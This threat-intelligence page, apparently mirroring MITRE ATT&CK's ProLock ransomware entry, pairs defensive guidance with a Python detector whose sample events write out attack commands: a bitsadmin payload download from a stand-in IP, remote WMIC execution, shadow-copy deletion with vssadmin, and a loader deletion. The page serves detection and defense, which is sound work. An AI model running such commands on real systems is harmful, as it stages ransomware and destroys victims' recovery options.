S0654: ProLock
Analyst context for executives and security teams
ProLock matters because MITRE identifies it as a Windows ransomware strain associated with Big Game Hunting operations and often paired with QakBot for initial access. For leaders, the practical issue is not just malware identification; it is whether the organization can detect precursor activity, contain Windows-based execution and persistence, and recover if encryption and recovery inhibition occur.
Executive priority
Treat ProLock as a ransomware-readiness validation case. Executives should ask whether incident response, backup recovery, endpoint telemetry, and Windows administration monitoring can prove coverage for the behaviors linked to this software: WMI execution, BITS abuse, privilege escalation, file deletion, data encryption, and interference with recovery. This is relevant to business continuity, ransomware response decision-making, and audit evidence around resilience controls.
Technical view
ATT&CK does not provide a ProLock-specific detection section, so SOC and IR teams should validate coverage against the related techniques rather than relying on a named-malware signature. On Windows, focus on suspicious WMI execution (WMIC launching scripts on local or remote hosts), abnormal BITS job creation or transfers that pull a payload, exploitation of the referenced privilege-escalation vulnerability (CVE-2019-0859) on unpatched hosts, deletion of the files that carried the payload, bulk file encryption, and removal of volume shadow copies with vssadmin.exe. The relationships also include steganography, with the payload stored inside .jpg and .bmp files, so teams should consider whether detection logic and triage workflows can surface unusual image downloads or hidden-content transfer patterns where local telemetry supports it.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- WMI activity logs and remote/local management execution evidence
- BITS job creation, modification, and transfer metadata
- Endpoint file creation, deletion, and mass file modification events
- Privilege escalation and vulnerability exploitation indicators from EDR, OS, and application logs
Detection direction
- Build or validate behavior-based detections mapped to the related techniques because official ProLock detection guidance is not supplied.
- Tune WMI and BITS detections to distinguish administrative software distribution or maintenance activity from unusual execution context, destinations, timing, or parent-child process chains.
- Correlate ransomware impact signals with earlier execution, persistence, privilege escalation, and recovery-inhibition events to improve incident timelines.
- Validate that file deletion and recovery-inhibition events are retained long enough for incident response, since these behaviors can remove evidence or reduce restoration options.
- Use the QakBot relationship as investigation context, not as a required precursor; do not assume every ProLock case begins the same way.
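The detection direction above is easier to validate with something that runs. The following is an added example, not part of the ATT&CK object, the Group-IB report or Glexia's tooling: it applies behavior rules for the four process-level techniques in the relationship table (T1047, T1197, T1490, T1070.004) to constructed Sysmon-style process-creation events, tunes out baseline BITS use by an assumed software-distribution agent (CcmExec.exe pulling from the assumed internal host dist.corp.example), and correlates each host's detections into a timeline that separates precursors from the recovery-inhibition event. Host names, the IP 203.0.113.7 and the file paths are constructed sample data, not indicators from the report.

```python
"""Behavior-based triage of Windows process-creation events for the techniques
this page links to ProLock: T1047 (WMI), T1197 (BITS), T1490 (shadow copy
deletion) and T1070.004 (payload file deletion). Added example, not ATT&CK or
Glexia code. Events are constructed to resemble Sysmon Event ID 1 fields, and
CcmExec.exe / dist.corp.example are assumed stand-ins for a local baseline.
"""
import re
from collections import namedtuple
from urllib.parse import urlparse

# host, ISO-8601 UTC time, created process image, its command line, parent image
ProcessEvent = namedtuple("ProcessEvent", "host time image command_line parent_image")
# impact=True marks actions that reduce recovery options (used for correlation)
Detection = namedtuple("Detection", "host time technique summary impact", defaults=[False])

# Tuning knobs (assumptions): replace with the organization's own baseline.
ADMIN_PARENTS = {"ccmexec.exe"}             # SCCM client legitimately drives BITS
INTERNAL_BITS_HOSTS = {"dist.corp.example"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://\S+")
DEL_EXEC_RE = re.compile(r"\b(del|erase)\b[^&|]*\.(exe|dll|bat|ps1)\b")


def _exe(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Map one process-creation event to a technique, or None if benign."""
    exe, parent, cmd = _exe(ev.image), _exe(ev.parent_image), ev.command_line.lower()
    toks = set(cmd.split())
    # T1490: shadow copy deletion with vssadmin, as documented for ProLock.
    if exe == "vssadmin.exe" and {"delete", "shadows"} <= toks:
        return Detection(ev.host, ev.time, "T1490", "vssadmin deleted shadow copies", True)
    # T1047: WMIC process creation (local or /node: remote), or a script host whose
    # parent is the WMI provider host, meaning the execution request arrived via WMI.
    if exe == "wmic.exe" and {"process", "call", "create"} <= toks:
        node = next((t.split(":", 1)[1].strip('"') for t in toks if t.startswith("/node:")), "localhost")
        return Detection(ev.host, ev.time, "T1047", f"wmic process call create targeting {node}")
    if parent == "wmiprvse.exe" and exe in SCRIPT_HOSTS:
        return Detection(ev.host, ev.time, "T1047", f"{exe} spawned by WmiPrvSE.exe")
    # T1197: bitsadmin pulling from a URL. Tuned out only when BOTH the parent is an
    # allowlisted distribution agent AND every source host is internal.
    if exe == "bitsadmin.exe" and ({"/transfer", "/addfile"} & toks):
        hosts = {urlparse(u).hostname or "?" for u in URL_RE.findall(cmd)}
        if parent in ADMIN_PARENTS and hosts and hosts <= INTERNAL_BITS_HOSTS:
            return None
        src = ", ".join(sorted(hosts)) or "unknown source"
        return Detection(ev.host, ev.time, "T1197", "bitsadmin transfer from " + src)
    # T1070.004: cmd deleting an executable/script, how a payload removes its launcher.
    if exe == "cmd.exe" and DEL_EXEC_RE.search(cmd):
        return Detection(ev.host, ev.time, "T1070.004", "cmd.exe deleted an executable or script")
    return None


def triage(events):
    """Detect, then build a per-host timeline. 'impact' is True when a recovery-
    inhibition event is present; 'precursors' lists the techniques seen on that
    host before it, the correlation the detection direction above asks for."""
    by_host = {}
    for ev in events:
        d = detect(ev)
        if d is not None:
            by_host.setdefault(d.host, []).append(d)
    report = {}
    for host, dets in by_host.items():
        dets.sort(key=lambda d: d.time)  # one collector, one fixed ISO-8601 format
        impact_at = next((i for i, d in enumerate(dets) if d.impact), None)
        report[host] = {
            "impact": impact_at is not None,
            "precursors": [d.technique for d in dets[:impact_at]] if impact_at is not None else [],
            "timeline": [(d.time, d.technique, d.summary) for d in dets],
        }
    return report


# Constructed sample telemetry (not real data): a workstation stages a payload via
# BITS, runs it on a file server through WMIC, and the server then wipes shadow
# copies. The last event is baseline SCCM activity that must not alert.
SAMPLE_EVENTS = [
    ProcessEvent("WS-0412", "2020-09-14T02:11:05Z", r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer upd /download /priority high http://203.0.113.7/img/wallpaper.bmp C:\Users\Public\wallpaper.bmp",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent("WS-0412", "2020-09-14T02:13:40Z", r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic /node:"FS-01" process call create "cmd.exe /c \\WS-0412\share\run.bat"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS-0412", "2020-09-14T02:14:02Z", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c del /f /q C:\Users\Public\loader.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent("FS-01", "2020-09-14T02:14:10Z", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c \\WS-0412\share\run.bat", r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcessEvent("FS-01", "2020-09-14T02:15:30Z", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS-0099", "2020-09-14T03:00:00Z", r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer patch http://dist.corp.example/kb/update.msp C:\Windows\Temp\update.msp",
                 r"C:\Windows\CCM\CcmExec.exe"),
]

if __name__ == "__main__":
    for host, rep in triage(SAMPLE_EVENTS).items():
        print(host, "IMPACT" if rep["impact"] else "no impact yet", "precursors:", rep["precursors"])
        for row in rep["timeline"]:
            print("   ", *row)
```

Run as a script, the file server FS-01 reports impact with T1047 as its precursor, the workstation WS-0412 reports BITS, WMIC and payload-deletion activity without impact yet, and WS-0099 produces nothing because its BITS transfer matches the administrative baseline. The allowlist is deliberately two-factor (parent and source host) so that a compromised distribution agent pulling from an external host still alerts.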
Mitigation priorities
- Prioritize tested, isolated, and recoverable backups, including evidence that recovery mechanisms cannot be easily disabled from compromised Windows endpoints; the documented use of vssadmin.exe to remove volume shadow copies means on-host shadow copies alone are not a recovery plan.
- Harden and monitor Windows administrative features such as WMI and BITS rather than blocking them blindly, since they may be business-critical.
- Maintain vulnerability management discipline for privilege-escalation exposure on Windows systems (the linked procedure cites CVE-2019-0859) and confirm patch evidence is available for audit and IR scoping.
- Limit administrative privileges and lateral administrative reach to reduce the blast radius if ransomware execution occurs.
- Prepare ransomware IR playbooks that include containment, recovery validation, evidence preservation, and executive decision points.
Analyst notes and limits
The most useful defensive framing is technique-driven. ProLock is described by MITRE as ransomware used in Big Game Hunting operations since at least 2020 and often obtaining initial access with QakBot. The relationships supplied connect it to stealth, execution, privilege escalation, persistence, and impact behaviors, making it a good scenario for testing ransomware resilience across SOC, IR, IAM, endpoint, backup, and vulnerability-management functions.
No official MITRE detection text is provided for ProLock, and the object has no ATT&CK tactics listed directly. The take is therefore based on the official description, Windows platform field, external references, and supplied technique relationships. Local telemetry, asset criticality, administrative baselines, and backup architecture are required to determine actual exposure or coverage.
ProLock
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1070.004 | Indicator Removal: File Deletion | ProLock can remove files containing its payload after they are executed. [1] |
| Enterprise | T1486 | Data Encrypted for Impact | ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024. [1] |
| Enterprise | T1047 | Windows Management Instrumentation | ProLock can use WMIC to execute scripts on targeted hosts. [1] |
| Enterprise | T1197 | BITS Jobs | ProLock can use BITS jobs to download its malicious payload. [1] |
| Enterprise | T1027.003 | Obfuscated Files or Information: Steganography | ProLock can use .jpg and .bmp files to store its payload. [1] |
| Enterprise | T1068 | Exploitation for Privilege Escalation | ProLock can use CVE-2019-0859 to escalate privileges on a compromised host. [1] |
| Enterprise | T1490 | Inhibit System Recovery | ProLock can use vssadmin.exe to remove volume shadow copies. [1] |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 6722a010ee38… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Group IB Ransomware September 2020: Group IB. (2020, September). LOCK LIKE A PRO. Retrieved November 17, 2024.
- [2] mitre-attack S0654: MITRE ATT&CK software entry for ProLock, https://attack.mitre.org/software/S0654
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.